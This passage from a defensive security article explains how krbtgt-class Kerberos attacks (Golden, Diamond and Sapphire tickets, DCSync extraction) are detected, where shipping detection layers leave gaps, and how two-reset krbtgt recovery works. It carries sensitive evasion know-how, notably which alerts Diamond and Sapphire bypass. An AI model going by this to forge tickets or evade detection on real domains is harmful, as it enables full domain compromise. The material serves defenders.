&lt;td&gt;Yes (recomputed under held key)&lt;/td&gt;
&lt;td&gt;Yes (recomputed)&lt;/td&gt;
&lt;td&gt;Yes (genuine PAC)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Known wire-residual?&lt;/td&gt;
&lt;td&gt;Encryption type, lifetime, groups&lt;/td&gt;
&lt;td&gt;Re-encryption-under-held-key timing&lt;/td&gt;
&lt;td&gt;S4U2self+U2U conjunction&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Six generations from MS14-068 to KrbtgtFullPacSignature, and the residual primitive is exactly what the 1988 paper described: hold the key, mint the ticket. So what does the detection topology in 2026 actually catch?&lt;/p&gt;
&lt;h2&gt;6. The Detection Stack in 2026&lt;/h2&gt;
&lt;p&gt;Detection of krbtgt-class attacks in 2026 is a four-layer stack. Each layer has a specific class of signal it reads, a specific class of attack it catches, and a specific gap that the next layer is supposed to close. Three of the four layers have a known gap above them. The fourth has nothing above it.&lt;/p&gt;

flowchart TD
    L4[&quot;Layer 4 -- S4U2self plus U2U residual (no vendor analytic shipped)&quot;]
    L3[&quot;Layer 3 -- Network/SIEM (Sentinel, Splunk T1558.001)&quot;]
    L2[&quot;Layer 2 -- Behavioural (MDI Suspected-Golden-Ticket family)&quot;]
    L1[&quot;Layer 1 -- Posture (BloodHound DCSync edge)&quot;]
    KEY[&quot;krbtgt long-term key (the attacker&apos;s objective)&quot;]
    L1 --&amp;gt; L2
    L2 --&amp;gt; L3
    L3 --&amp;gt; L4
    L4 --&amp;gt; KEY
&lt;h3&gt;Layer 1: posture (BloodHound DCSync edge)&lt;/h3&gt;
&lt;p&gt;The posture layer asks a question with no per-event component: &quot;Who has rights that &lt;em&gt;could&lt;/em&gt; extract the krbtgt key, regardless of whether they have used those rights?&quot; In Active Directory terms, the answer is &quot;anyone holding &lt;code&gt;DS-Replication-Get-Changes&lt;/code&gt; plus &lt;code&gt;DS-Replication-Get-Changes-All&lt;/code&gt; rights against a writeable DC, plus anyone who holds privileges that allow them to grant those rights to themselves.&quot; BloodHound encodes the answer as a &lt;code&gt;DCSync&lt;/code&gt; edge in its graph; the canonical community Cypher query is &lt;code&gt;MATCH (u)-[:DCSync]-&amp;gt;(d:Domain) RETURN u, d&lt;/code&gt;. The current shipping release of BloodHound Community Edition is v9.1.0, dated 2026-05-06 per the release notes [@bloodhound-notes].&lt;/p&gt;

A replication primitive Mimikatz first productionised in August 2015. The attacker invokes the `DRSGetNCChanges` API call against a writeable domain controller, masquerading as a peer DC, and the target DC obligingly streams back the requested account secrets including the krbtgt long-term key. MITRE T1003.006 catalogues the technique [@mitre-t1003006]. Sean Metcalf&apos;s adsecurity.org write-up notes &quot;DCSync was written by Benjamin Delpy and Vincent Le Toux&quot; [@adsec-1729].
&lt;p&gt;What this layer detects: any principal whose existing AD permissions create a path to the krbtgt key. What this layer misses: any attacker who &lt;em&gt;already&lt;/em&gt; has the key. Posture is preventive, not detective. By the time the attacker is invoking &lt;code&gt;kerberos::golden&lt;/code&gt;, the posture layer has already missed its window.&lt;/p&gt;
&lt;h3&gt;Layer 2: behavioural (Microsoft Defender for Identity)&lt;/h3&gt;
&lt;p&gt;Microsoft Defender for Identity ships an alert family covering classic Golden-Ticket-from-Mimikatz behaviour. The live MDI classic alerts page enumerates six Suspected-Golden-Ticket External IDs: 2009 (encryption downgrade), 2013 (forged authorization data), 2022 (time anomaly), 2027 (nonexistent account), 2032 (ticket anomaly), and 2040 (ticket anomaly using RBCD) [@mdi-classic]. The Credential access section adds External ID 2006 for &quot;Suspected DCSync attack&quot; on the extraction side [@mdi-classic].&lt;/p&gt;
&lt;p&gt;What this layer detects: the Mimikatz Golden Ticket defaults plus the DCSync extraction primitive that produces the krbtgt key in the first place. What this layer misses: Diamond and Sapphire by construction. Diamond removes the PAC-content anomalies because every artefact except the modified group SIDs comes from the real KDC. Sapphire defeats PAC-content anomaly detection entirely by using a PAC the KDC genuinely issued via S4U2self plus U2U.&lt;/p&gt;
&lt;p&gt;The MDI credential-access alerts page is the entry point to the family in the modern Microsoft Defender XDR console layout [@mdi-credential].&lt;/p&gt;
&lt;h3&gt;Layer 3: network and SIEM (Sentinel, Splunk)&lt;/h3&gt;
&lt;p&gt;Multi-vendor SIEM content packs ship analytic rules covering Kerberos behaviours flagged under MITRE T1558.001. Splunk&apos;s research catalogue contains the canonical example: &quot;Kerberos Service Ticket Request Using RC4 Encryption&quot; detects TGS-REQ traffic with encryption-type 0x17 (RC4-HMAC), leveraging Windows Event 4769 from the DCs [@splunk-7d9]. Microsoft Sentinel ships parallel rules under the Microsoft Defender XDR content connector. The pattern these analytics share is reliance on encryption-type anomalies, group-membership anomalies, or lifetime anomalies that appear in Windows event logs after the fact.&lt;/p&gt;
&lt;p&gt;What this layer detects: signature-style indicators of Golden Ticket behaviour on the wire and in the DC event log. What this layer misses: the same encryption-downgrade dependency MDI&apos;s alert 2009 has. The Splunk analytic verbatim acknowledges its own limit: &quot;This detection may be bypassed if attackers use the AES key instead of the NTLM hash&quot; [@splunk-7d9]. Diamond and Sapphire both use the AES-256 key. Both walk through this layer untouched.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft Sentinel ships rules called &quot;Kerberoasting&quot; that target MITRE T1558.003 (extracting service-account secrets by requesting SPN-bearing service tickets and brute-forcing the resulting RC4-encrypted blobs offline). Those rules target &lt;em&gt;service accounts&lt;/em&gt; with SPNs registered against them. They are not a krbtgt detection asset. The krbtgt account does not have an SPN that any client can request a TGS for; the relevant Sentinel content for krbtgt-class attacks is the T1558.001 Golden-Ticket and Kerberos-anomaly analytic family.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Layer 4: the Sapphire residual&lt;/h3&gt;
&lt;p&gt;What would catch a Sapphire Ticket? The only wire-observable residual of the technique is the conjunction of (a) a TGS-REQ specifying the S4U2self flag, and (b) the same TGT being used to address a User-to-User request to the KDC. No other layer of the stack reads this signal because no other attack has historically produced it as a precondition.&lt;/p&gt;
&lt;p&gt;What ships: nothing canonical. SpecterOps and the BloodHound content team have signalled graph-query work on the U2U TGS issuance pattern in 2026 trend reports [@bloodhound-notes], but no shipped default-enabled analytic. Palo Alto Unit 42&apos;s &quot;Precious Gemstones&quot; survey describes Cortex XDR detection-attempt heuristics but does not publish the rule [@unit42-gemstones]. The gap is engineering, not theoretical: the signal exists, the analytic to read it has simply not been packaged.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; No vendor analytic shipped for the S4U2self plus U2U conjunction as of May 2026. Sapphire is the current frontier and the article&apos;s &quot;what 2026 still cannot do&quot; gap. An attacker who holds the krbtgt key and uses the Sapphire technique walks past every shipping detection layer.&lt;/p&gt;
&lt;/blockquote&gt;

SpecterOps and the BloodHound content team have signalled graph-query work on the U2U TGS issuance pattern; Palo Alto Unit 42&apos;s &quot;Precious Gemstones&quot; survey describes Cortex XDR detection-attempt heuristics [@unit42-gemstones]. Neither has shipped a clean canonical default-enabled analytic. The gap is engineering, not theoretical, and it is the active research front for the 2026 to 2028 cycle.
&lt;h3&gt;Defensive method matrix&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Catches Golden?&lt;/th&gt;
&lt;th&gt;Catches Diamond?&lt;/th&gt;
&lt;th&gt;Catches Sapphire?&lt;/th&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;BloodHound DCSync edge&lt;/td&gt;
&lt;td&gt;preventive only&lt;/td&gt;
&lt;td&gt;preventive only&lt;/td&gt;
&lt;td&gt;preventive only&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDI Suspected-Golden-Ticket (4 alerts)&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDI Suspected DCSync (ID 2006)&lt;/td&gt;
&lt;td&gt;extraction step only&lt;/td&gt;
&lt;td&gt;extraction step only&lt;/td&gt;
&lt;td&gt;extraction step only&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sentinel / Splunk T1558.001 RC4 rule&lt;/td&gt;
&lt;td&gt;yes (if RC4)&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sentinel Kerberos-anomaly content pack&lt;/td&gt;
&lt;td&gt;partial (lifetime/groups)&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Full PAC Signature (post-July 2023)&lt;/td&gt;
&lt;td&gt;n/a (already signed correctly)&lt;/td&gt;
&lt;td&gt;retires non-recomputing variants&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;td&gt;n/a (cryptographic enforcement, not detection)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;S4U2self+U2U conjunction analytic&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;would catch&lt;/td&gt;
&lt;td&gt;4 (not shipped)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Adjacent Kerberos-credential techniques that are not krbtgt detections&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;What it targets&lt;/th&gt;
&lt;th&gt;krbtgt detection?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;T1558.002 Silver Ticket&lt;/td&gt;
&lt;td&gt;service-account long-term keys&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1558.003 Kerberoasting&lt;/td&gt;
&lt;td&gt;SPN-bearing service accounts via offline RC4 crack&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1558.004 AS-REP Roasting&lt;/td&gt;
&lt;td&gt;accounts with pre-auth disabled&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OverPass-the-Hash&lt;/td&gt;
&lt;td&gt;user NTLM hashes via Kerberos PA-DATA&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Detection in 2026 is a four-layer stack, and three of the layers leave gaps the next layer is supposed to close. The fourth gap -- the Sapphire residual -- has no layer above it. When the gaps close enough to confirm a krbtgt compromise, what does recovery actually look like?&lt;/p&gt;
&lt;h2&gt;7. Recovery: What the Two-Reset Procedure Actually Does&lt;/h2&gt;
&lt;p&gt;The Microsoft AD Forest Recovery page states the procedure verbatim:&lt;/p&gt;

&quot;You should perform this operation twice. You must wait 10 hours between password resets. 10 hours are the default Maximum lifetime for user ticket and Maximum lifetime for service ticket policy settings, hence in a case where the Maximum lifetime period changes, the minimum waiting period between resets should be greater than the configured value.&quot; -- and -- &quot;The password history value for the krbtgt account is 2, meaning it includes the two most recent passwords. By resetting the password twice you effectively clear any old passwords from the history, so there&apos;s no way another DC replicates with this DC by using an old password.&quot; [@ms-forest-recovery]
&lt;p&gt;What exactly do those two resets buy, and what do they not buy?&lt;/p&gt;
&lt;h3&gt;The mechanics of two-slot eviction&lt;/h3&gt;
&lt;p&gt;The krbtgt account, like every other AD account, stores both &lt;em&gt;current&lt;/em&gt; and &lt;em&gt;previous&lt;/em&gt; keys. A TGT issued at time $T = 0$ under key $K_0$ continues to validate after a rotation at $T = T_1$ (when $K_1$ becomes current and $K_0$ moves to the previous slot), because the KDC tries both keys during the in-flight validation window. One rotation fills the previous slot with the now-replaced $K_0$; the second rotation, separated by at least &lt;code&gt;MaxTicketAge&lt;/code&gt; so that all $K_0$-signed TGTs have expired naturally, fills the previous slot with $K_1$ and evicts $K_0$ entirely. After the second rotation completes and replicates, no key in the krbtgt account matches the attacker&apos;s extracted $K_0$; forged TGTs from that key fail validation cleanly [@ms-forest-recovery].&lt;/p&gt;

The Kerberos policy value that bounds the lifetime of a Ticket-Granting Ticket from the moment of issuance. The Active Directory default is 10 hours, configured via the Default Domain Policy. The AD Forest Recovery procedure waits at least `MaxTicketAge` between krbtgt resets to ensure no in-flight TGT outlives the period between the two rotations [@ms-forest-recovery].

flowchart LR
    A0[&quot;T=0: K_0 current, K_prior previous&quot;] --&amp;gt; A1[&quot;T=T_1: reset 1 -- K_1 current, K_0 previous&quot;]
    A1 --&amp;gt; A2[&quot;T_1 + 10h: K_1 still current, K_0 still previous&quot;]
    A2 --&amp;gt; A3[&quot;T=T_2 (≥ T_1 + 10h): reset 2 -- K_2 current, K_1 previous&quot;]
    A3 --&amp;gt; A4[&quot;After replication: K_0 evicted from both slots&quot;]
&lt;p&gt;The 10-hour wait between resets is not an arbitrary convenience; it is the &lt;code&gt;MaxTicketAge&lt;/code&gt; safety interval that prevents legitimate still-live TGTs from being rejected during the second reset. If the second reset lands before all $K_0$-signed TGTs have expired naturally, some of those tickets will hit a DC whose previous slot now holds $K_1$ rather than $K_0$, and the KDC will reject them. This is what KB5020805&apos;s PAC-signature deployment phases also had to navigate during the November 2022 to October 2023 rollout: signature additions and validation transitions had to bracket the maximum in-flight ticket lifetime [@kb5020805].&lt;/p&gt;
&lt;p&gt;{`
// Model the krbtgt account as a two-slot store; simulate the two-reset procedure.
function simulate(events) {
  const slots = { current: &quot;K_prior&quot;, previous: null };
  let stolen = null;
  for (const ev of events) {
    if (ev.kind === &quot;compromise&quot;) {
      stolen = slots.current;
    } else if (ev.kind === &quot;reset&quot;) {
      slots.previous = slots.current;
      slots.current  = ev.newKey;
    }
    const validates =
      stolen &amp;amp;&amp;amp; (stolen === slots.current || stolen === slots.previous);
    console.log(
      &quot;[t=&quot; + ev.t.toString().padStart(3) + &quot;h]&quot;,
      ev.kind.padEnd(11),
      &quot;current=&quot; + slots.current,
      &quot;prev=&quot; + (slots.previous ?? &quot;-&quot;),
      &quot;attacker_validates=&quot; + validates
    );
  }
}&lt;/p&gt;
&lt;p&gt;simulate([
  { t: 0,  kind: &quot;issue&quot;      },
  { t: 1,  kind: &quot;compromise&quot; },  // attacker stores K_prior as stolen
  { t: 3,  kind: &quot;reset&quot;, newKey: &quot;K_1&quot; },
  { t: 13, kind: &quot;reset&quot;, newKey: &quot;K_2&quot; },  // ≥ MaxTicketAge later
  { t: 14, kind: &quot;issue&quot;      },
]);
`}&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;New-KrbtgtKeys.ps1&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s reference automation for the procedure is &lt;code&gt;New-KrbtgtKeys.ps1&lt;/code&gt;, originally distributed via TechNet Gallery and currently hosted in the &lt;code&gt;microsoftarchive&lt;/code&gt; GitHub organisation. The repository banner reads, verbatim: &quot;This repository was archived by the owner on Mar 8, 2024. It is now read-only&quot; [@new-krbtgt-keys]. The script remains the canonical reference for the rotation procedure, including pre-reset and post-reset replication-health checks; it is simply no longer actively maintained. Operators in 2026 commonly fork it locally or wrap the same &lt;code&gt;Set-ADAccountPassword&lt;/code&gt; plus replication-status pattern in their own runbooks.&lt;/p&gt;
&lt;h3&gt;What two-reset does&lt;/h3&gt;
&lt;p&gt;Cryptographically invalidates previously-forged TGTs after the second reset replicates fully across all writeable DCs. This is unambiguous and well-documented; the Microsoft Learn page is the primary [@ms-forest-recovery]. After step 3 (the second reset) has replicated, no TGT signed under the pre-compromise key validates anywhere in the domain.&lt;/p&gt;
&lt;h3&gt;What two-reset does not do&lt;/h3&gt;
&lt;p&gt;Any attacker who held the krbtgt key has typically already installed parallel persistence. SpecterOps&apos;s &quot;Domain of Thrones Part II&quot; by Nico Shyne and Josh Prager, published November 6, 2023, names the rotation list verbatim: &quot;Machine accounts ... User accounts ... Service accounts -- Per domain KRBTGT account ... Trust keys and objects related to trust of all other domains; Group-managed service accounts; Key distribution service root keys&quot; [@specterops-dot2]. The same playbook enumerates the persistence vectors an attacker with krbtgt access typically establishes: AdminSDHolder ACL edits, AD CS template alternates spanning the ESC1 through ESC8 abuse classes (canonically catalogued in Schroeder and Christensen&apos;s &quot;Certified Pre-Owned,&quot; SpecterOps, June 2021) [@certified-pre-owned], SID History entries, machine-account secret retention, KDS root key exfiltration, trust-key compromise, and DSRM password exfiltration. Two-reset rotates the krbtgt key only; the rest of the trust-root set is untouched [@specterops-dot1][@specterops-dot2].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Two-reset rotation cryptographically invalidates previously-forged TGTs. It does NOT rotate any of the other secrets an attacker who held the krbtgt key has typically already installed: AdminSDHolder edits, ADCS templates, SID History, machine-account secrets, KDS root keys, trust keys, DSRM passwords. This is why confirmed krbtgt compromise is a forest-rebuild event, not a key-rotation event.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Two-reset rotation is the cryptographic finish; the operational finish spans the rest of the Domain-of-Thrones surface, and the rotation alone cannot reach it. The single-sentence punchline of the article lands at the end of §11.&lt;/p&gt;

Why does Microsoft&apos;s AD Forest Recovery page treat krbtgt rotation as a recoverable rotation event while Mandiant-style and SpecterOps-style playbooks treat confirmed krbtgt compromise as a forest-rebuild event? Both statements are true at once. Microsoft documents the *cryptographic* recovery, which terminates at the krbtgt key. The IR playbooks document the *operational* recovery, which spans seven additional secret classes whose compromise the krbtgt holder typically also achieved. The cryptographic recovery is necessary and well-bounded; the operational recovery is necessary and not bounded by the same key.
&lt;p&gt;Recovery has two pieces: a fast cryptographic part (two resets, well-documented) and a slow operational part (seven other secret classes, days to weeks). Both are necessary. Neither is sufficient. Even the combined procedure leaves three structural residuals, which the next section names.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits and Open Problems&lt;/h2&gt;
&lt;p&gt;Even with the full Domain-of-Thrones rotation surface executed correctly, three structural residuals remain. Each has a current best-partial-result; none has a closed solution.&lt;/p&gt;
&lt;h3&gt;(a) The pre-second-reset TGT-lifetime window&lt;/h3&gt;
&lt;p&gt;Any TGT minted from the compromised krbtgt key between the moment of compromise and the moment the second reset replicates remains valid until naturally expired or until step 3 lands. Mimikatz&apos;s default 10-year lifetime makes this a years-long window if the attacker pre-minted tickets and a careless DC missed the time-anomaly signal. The MDI Suspected-Golden-Ticket family includes a time-anomaly alert (the External ID 2022 sibling) [@mdi-classic] that reads the difference between plausible and implausible ticket lifetimes. The window is bounded above by the AD &lt;code&gt;MaxTicketAge&lt;/code&gt; floor: at minimum, the procedure must take 10 hours of wall-clock per Microsoft&apos;s own guidance [@ms-forest-recovery]. Below that floor the cryptographic invalidation does not finish.&lt;/p&gt;
&lt;p&gt;The mitigation is procedural: between detection and the start of the rotation, the IR team treats every TGT in the domain as suspect. In practice that means rejecting cached tickets at high-value services, forcing a TGT renewal cycle, and watching the time-anomaly alert closely. The mitigation is not perfect; an attacker who minted tickets with realistic 10-hour lifetimes inside the typical AD policy survives this residual entirely.&lt;/p&gt;
&lt;h3&gt;(b) AD CS alternate persistence (the ESC class)&lt;/h3&gt;
&lt;p&gt;An attacker who held the krbtgt key long enough to also touch AD Certificate Services has often installed an ESC-class alternate-identity persistence: a backdoored client-authentication template that lets a low-privileged enrollee supply its own subject (the &lt;code&gt;ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; class, ESC1), a template whose weak ACLs let an attacker modify it into one (ESC4), an HTTP-bound CA endpoint vulnerable to &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM relay&lt;/a&gt; (ESC8). The ESC class taxonomy is catalogued in Schroeder and Christensen&apos;s &quot;Certified Pre-Owned&quot; white paper (SpecterOps, June 2021) [@certified-pre-owned]. The compromised template or endpoint survives krbtgt rotation entirely. The CA private key is its own trust root, parallel to (not subordinate to) the krbtgt key. Domain-of-Thrones Part II names ADCS as a separate rotation workstream that must be addressed alongside the krbtgt reset [@specterops-dot2].&lt;/p&gt;
&lt;p&gt;The structural fact: a domain with AD CS deployed has at least two cryptographic trust roots (krbtgt long-term key + CA private key) whose compromises are &lt;em&gt;both&lt;/em&gt; recoverable only through different mechanisms. PKINIT, the Kerberos pre-authentication extension that validates certificate-bearing AS-REQs, accepts identities the CA chain attests to. Compromise of the CA chain yields valid Kerberos authentication as any principal, by a different mechanism than holding the krbtgt key, with the same end result.&lt;/p&gt;
&lt;h3&gt;(c) Cross-domain trust-key compromise&lt;/h3&gt;
&lt;p&gt;Within a multi-domain forest, the krbtgt of each domain is trusted by the others through inter-domain trust keys. A krbtgt compromise in a child domain can become a forest-level event if the trust topology is not hardened: SID Filtering misconfigurations, missing Selective Authentication on outbound trusts, or stale forest-trust artefacts from earlier domain migrations all extend the blast radius beyond the directly-compromised domain. Microsoft&apos;s &quot;Recover from systemic identity compromise&quot; guidance and the AD Forest Recovery procedure index together cover the cross-domain rotation requirements; Domain-of-Thrones Part II&apos;s &quot;Trust keys and objects related to trust of all other domains&quot; entry is the concise operational statement [@specterops-dot2].&lt;/p&gt;
&lt;p&gt;The mitigation is architectural: domain-isolation discipline at the design phase plus Selective Authentication on all inbound trusts. After the fact, every domain whose krbtgt the compromised domain trusted (directly or transitively) becomes part of the rotation surface.&lt;/p&gt;
&lt;h3&gt;(d) The HSM-bound krbtgt aspiration&lt;/h3&gt;
&lt;p&gt;A theoretically clean solution exists in the literature: split the krbtgt key material such that no single party -- including the DC&apos;s own KDC service -- could read the full key in cleartext. The construction would be a hardware-security-module-bound krbtgt key (the HSM exposes only sign and verify operations on a key it never releases), or a threshold-cryptography scheme (the key is reconstructed across $n$ DCs, $t$ of which must cooperate per ticket-signing operation). Either construction would close the underlying primitive by making the krbtgt key unreadable in cleartext to anyone with code execution on a DC.&lt;/p&gt;
&lt;p&gt;Neither construction is supported by any [MS-KILE] revision through 47.0 dated April 27, 2026 [@mskile]. Neither is on any published Microsoft roadmap as of May 2026. The closest analogues that have shipped -- LSAISO/Credential Guard&apos;s VBS trustlet for LSASS secrets on workstations and member servers -- explicitly omit the writeable-DC case by design, because a writeable DC must read the krbtgt key to issue tickets.&lt;/p&gt;
&lt;p&gt;Even after two-reset and Domain of Thrones, three residuals remain: a window of time, an alternate trust root, and a topology problem. None of them are theoretical -- all three are operational realities documented in 2024-2026 incident-response practice. But they raise a different question: how does the krbtgt key compare to the other secrets in an AD trust-root set?&lt;/p&gt;
&lt;h2&gt;9. Where KRBTGT Sits in the AD Trust-Root Set&lt;/h2&gt;
&lt;p&gt;A correction to a framing that appears in many secondary write-ups: the krbtgt long-term key is &lt;em&gt;one&lt;/em&gt; of a small set of &quot;AD trust roots,&quot; not the only one. The framing matters because the rotation playbook in Section 7 lists seven secret classes for a reason: each is a candidate trust root that survives compromise of any other.&lt;/p&gt;

flowchart TD
    K[&quot;krbtgt long-term key&quot;] --&amp;gt;|&quot;every TGT in the domain&quot;| ENVA[&quot;Domain-wide Kerberos auth&quot;]
    C[&quot;AD CS root CA private key&quot;] --&amp;gt;|&quot;PKINIT certificates&quot;| ENVA
    G[&quot;KDS root key&quot;] --&amp;gt;|&quot;gMSA password derivation&quot;| SVC[&quot;Service-account auth&quot;]
    T[&quot;Inter-domain trust keys&quot;] --&amp;gt;|&quot;cross-domain TGT minting&quot;| FOR[&quot;Forest-wide auth&quot;]
    D[&quot;DSRM passwords on writeable DCs&quot;] --&amp;gt;|&quot;local-admin equivalent&quot;| DC[&quot;DC-local auth&quot;]
    DC --&amp;gt; ENVA
    DC --&amp;gt; C
    DC --&amp;gt; G
    DC --&amp;gt; T
    DC --&amp;gt; K
&lt;p&gt;&lt;strong&gt;KRBTGT long-term key.&lt;/strong&gt; Issues TGTs for all principals in the domain. Unique property within the Kerberos trust root: holding it forges TGTs for arbitrary principals, including ones that do not exist in the directory. Rotation: the two-reset, ten-hour-interval procedure on the AD Forest Recovery page [@ms-forest-recovery].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;AD CS root CA private key.&lt;/strong&gt; Issues certificates that PKINIT trusts for Kerberos pre-authentication. Compromise yields Kerberos auth as any principal via PKINIT -- a different mechanism with the same end result. Rotation: CA hierarchy rebuild, significantly more expensive than krbtgt rotation. SpecterOps &quot;Certified Pre-Owned&quot; (Schroeder + Christensen, June 2021) is the canonical primary on the ESC-class abuses of this trust root, cross-referenced in Domain of Thrones Part II [@certified-pre-owned][@specterops-dot2].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;KDS root key.&lt;/strong&gt; Group Managed Service Account passwords are derived deterministically from a &lt;a href=&quot;https://paragmali.com/blog/dpapi-and-dpapi-ng-the-credential-vault-under-everything/&quot; rel=&quot;noopener&quot;&gt;KDS root key&lt;/a&gt; plus a per-account &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt;. Compromise of the KDS root key reads every gMSA password in the forest. Different blast radius (service accounts only). Rotation: KDS root key rotation followed by gMSA cycling [@specterops-dot2].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Per-domain inter-domain trust keys.&lt;/strong&gt; Bridge Kerberos trust between domains in a forest or across explicit external trusts. Compromise yields cross-domain TGT minting. Rotation: per-trust password rotation, with SID Filtering and Selective Authentication audits as the standard hardening procedure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DSRM passwords on writeable DCs.&lt;/strong&gt; Directory Services Restore Mode is a local-admin equivalent at the DC level; compromise yields a local logon to the DC, which then enables many other paths including direct read of the krbtgt key from &lt;code&gt;ntds.dit&lt;/code&gt;. Rotation: per-DC DSRM password rotation [@specterops-dot2].&lt;/p&gt;
&lt;h3&gt;The precise framing&lt;/h3&gt;
&lt;p&gt;Within the Kerberos trust root of a single domain, the krbtgt key occupies a &lt;em&gt;unique&lt;/em&gt; position: it is the issuer of every TGT, and forging a TGT requires exactly this key. At the forest-AD-trust-graph level, the krbtgt key is one of a handful of high-cost-to-rotate trust roots, not the only one. The framing matters because it explains why Domain of Thrones Part II lists seven rotation workstreams: each is a candidate path to the same end result (arbitrary identity in the forest) through a different cryptographic mechanism.&lt;/p&gt;
&lt;p&gt;Five trust roots, one (krbtgt) with a unique forge-arbitrary-TGTs property, all five surfacing in the rotation list. With the trust-root topology mapped, the article&apos;s last technical job is the practical playbook: what does the reader actually do tomorrow morning?&lt;/p&gt;
&lt;h2&gt;10. Practical Guide: The Rotation and Detection Playbook&lt;/h2&gt;
&lt;p&gt;Four lanes. Each lane is a concrete action a reader can execute starting tomorrow morning.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Lane 1:&lt;/strong&gt; Preventive hygiene -- rotate krbtgt twice a year on a calendar schedule and audit who can DCSync. &lt;strong&gt;Lane 2:&lt;/strong&gt; Detection deployment -- ship MDI Suspected-Golden-Ticket alerts plus SIEM T1558.001 content. &lt;strong&gt;Lane 3:&lt;/strong&gt; Confirmed-compromise response -- two-reset rotation followed by the Domain-of-Thrones surface. &lt;strong&gt;Lane 4:&lt;/strong&gt; What does NOT work -- four traps to avoid.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Lane 1: preventive hygiene&lt;/h3&gt;
&lt;p&gt;Rotate the krbtgt password twice a year on a calendar schedule, regardless of any specific incident. Use &lt;code&gt;New-KrbtgtKeys.ps1&lt;/code&gt; (or a fork of it) with pre-reset and post-reset replication-health checks [@new-krbtgt-keys]. Verify Active Directory replication health between the two rotations; if replication is lagging on any DC, the second reset can outpace the first in some replicas and break in-flight tickets.&lt;/p&gt;
&lt;p&gt;Move every Tier-0 account into the Protected Users group. Enable Credential Guard on every workstation and member server. Credential Guard does NOT protect the DC itself by design -- DCs must read the krbtgt key unencrypted -- but it kills the worker-station memory-scrape that initially gets an attacker into a position to pivot to the DC.&lt;/p&gt;
&lt;p&gt;Audit who can invoke DCSync. The BloodHound query &lt;code&gt;MATCH (u)-[:DCSync]-&amp;gt;(d:Domain)&lt;/code&gt; returns every principal whose existing AD permissions can extract the krbtgt key without a DC compromise [@bloodhound-notes][@mitre-t1003006]. Every match should map to a justified administrative role; any unexpected match is a finding.&lt;/p&gt;

LSAISO is a Virtualisation-Based Security trustlet that isolates long-term secrets from a SYSTEM-privileged kernel on workstations and member servers. On writeable DCs the design omits LSAISO because the KDC service must read the krbtgt key unencrypted to issue tickets. This is precisely the design property a DCSync-capable attacker exploits.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Two krbtgt rotations per year as preventive hygiene -- not a response to a specific incident. Use &lt;code&gt;New-KrbtgtKeys.ps1&lt;/code&gt; with replication-health checks before, between, and after. The 10-hour wait between rotations is mandatory; do not shorten it [@ms-forest-recovery].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Lane 2: detection deployment&lt;/h3&gt;
